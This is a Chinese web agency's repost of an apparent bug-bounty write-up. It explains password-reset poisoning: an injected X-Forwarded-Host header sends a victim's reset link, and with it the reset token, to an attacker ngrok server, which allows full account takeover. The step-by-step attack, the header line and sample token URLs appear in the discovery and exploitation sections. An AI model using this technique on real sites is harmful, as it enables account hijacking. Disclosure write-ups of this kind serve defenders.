网站建设、公众号开发、微网站、微商城、小程序就找牛创网络 !

7*24小时服务专线: 152-150-65-006 023-68263070 扫描二维码加我微信 在线QQ

漏洞公告团结互助,让我们共同进步!

当前位置:主页 > 技术资讯 > 网络安全 > 漏洞公告 >

我们的优势: 10年相关行业经验,专业设计师量身定制 设计师一对一服务模式,上百家客户案例! 企业保证,正规流程,正规合作 7*24小时在线服务,售后无忧

使用目标网站的“忘记密码”功能,在重置密码请求数据包中添加X-Forwarded-Host主机信息

文章来源:重庆网站建设 发布时间:2020-01-05 20:36:40 围观次数:
分享到:

摘要:使用目标网站的“忘记密码”功能,在重置密码请求数据包中添加X-Forwarded-Host主机信息,目标站点被诱使将密码重置链接重定向到其自己的服务器,从而完全劫持了受害者的帐户。

目标站点被诱使将密码重置链接重定向到其自己的服务器,从而完全劫持了受害者的帐户。


  在这里,为了保密起见,首先假定目标测试站点为redacted.com。 在测试期间,我专注于其“忘记密码”功能。 经过六个小时的折磨,我发现了一个非常有趣的漏洞,可以用来对目标受害者进行完整的帐户劫持。


  发现过程


  所需工具:BurpSuite,Ngrok Server。  Ngrok服务可以将其本地PC映射到云上的服务器公共网络。 目的是将本地PC变成与外部网络通信的终端服务器。 间接地,云上的服务器成为外部网络和内部网络PC之间的过渡。


  1.访问目标网站的“忘记密码”功能,在其中输入用户名信息,并请求一个链接以重置密码:https://redacted.com/users/forgot_password,注意:此后,目标网站将发送一个验证码。


  2.在上述过程中,使用BurpSuite启用Web捕获。 请求包如下:

image.png

然后,我们添加一个X-Forwarded-Host:bing.com,以尝试查看目标网站是否将这个重置密码链接包含在bing.com中;


  X-Forwarded-For(XFF)是HTTP请求字段,用于标识通过HTTP代理或负载平衡连接到Web服务器的客户端的最原始IP地址。  Squid缓存代理服务器的开发人员首先介绍了此HTTP字段。


  3。我们打开邮箱,然后查看目标网站发送的密码重置链接。从电子邮件中我们可以看到它包含用于用户令牌信息的密码重置链接。 

  https://bing.com/users/reset_password/tqo4Xciu806oiR1FjX8RtIUc1DTcm1B5Kqb53j1fLEkzMW2GPgCpuEODDStpRaES

image.png

这样,我们可以认为我的密码重置令牌信息已转发到bing.com。 在这里,我们需要验证令牌,因此我们可以在密码重置链接中替换https://bing.com。  Https://redacted.com作为目标网站;


  4.果然,我们打开了一个可以真正实现密码重置的页面!


  利用

  

基于上述操作和存在的问题,我可以构建一个网络体系结构来劫持用户相关信息。 进行如下:


  1.通过ngrok服务设置Attacker服务器;


  2.打开Burpsuite捕获数据包,在目标网站的“忘记密码”中输入受害者的用户名,然后执行密码重置确认操作;


  3.在Burpsuite捕获的密码重置请求数据包中,添加以下格式的攻击服务器:


  X-Forwarded-Host: ngrok.io

  其中ngrok.io是攻击服务器的域名地址。 如:

image.png

4.因此,当受害者的邮箱收到目标网站发送的密码重置链接时,将包含攻击服务器的域名地址,例如:


  http://ngrok.io/users/reset_password/tqo4Xciu806oiR1FjX8RtIUc1DTcm1B5Kqb53j1fLEkzMW2GPgCpuEODDStpRaES


  当受害者不小心单击该链接时,他将使用用户密码重置其令牌以请求攻击服务器ngrok.io(此处需要与用户进行交互);


  5.当受害者单击上面的链接时,在攻击者服务器ngrok.io上,攻击者将看到包含受害者用户的密码重置令牌的请求消息,如下所示:

image.png

6.此时,在攻击者获得受害者用户的密码重置令牌之后,攻击者服务器ngrok.io被替换为目标网站https://redacted.com,再加上受害者用户You的后续密码重置令牌。 可以成功重置受害者帐户的密码,并完全劫持其帐户。

本文由 重庆网站建设 整理发布,转载请保留出处,内容部分来自于互联网,如有侵权请联系我们删除。

相关热词搜索:目标网站 忘记密码 重置密码 数据包 X-Forwarded-Host

上一篇:国内儿童智能手表爆高危安全防护漏洞映射网站建设安全的重要性
下一篇:操纵BGP Communities来实现劫持攻击

热门资讯

鼠标向下滚动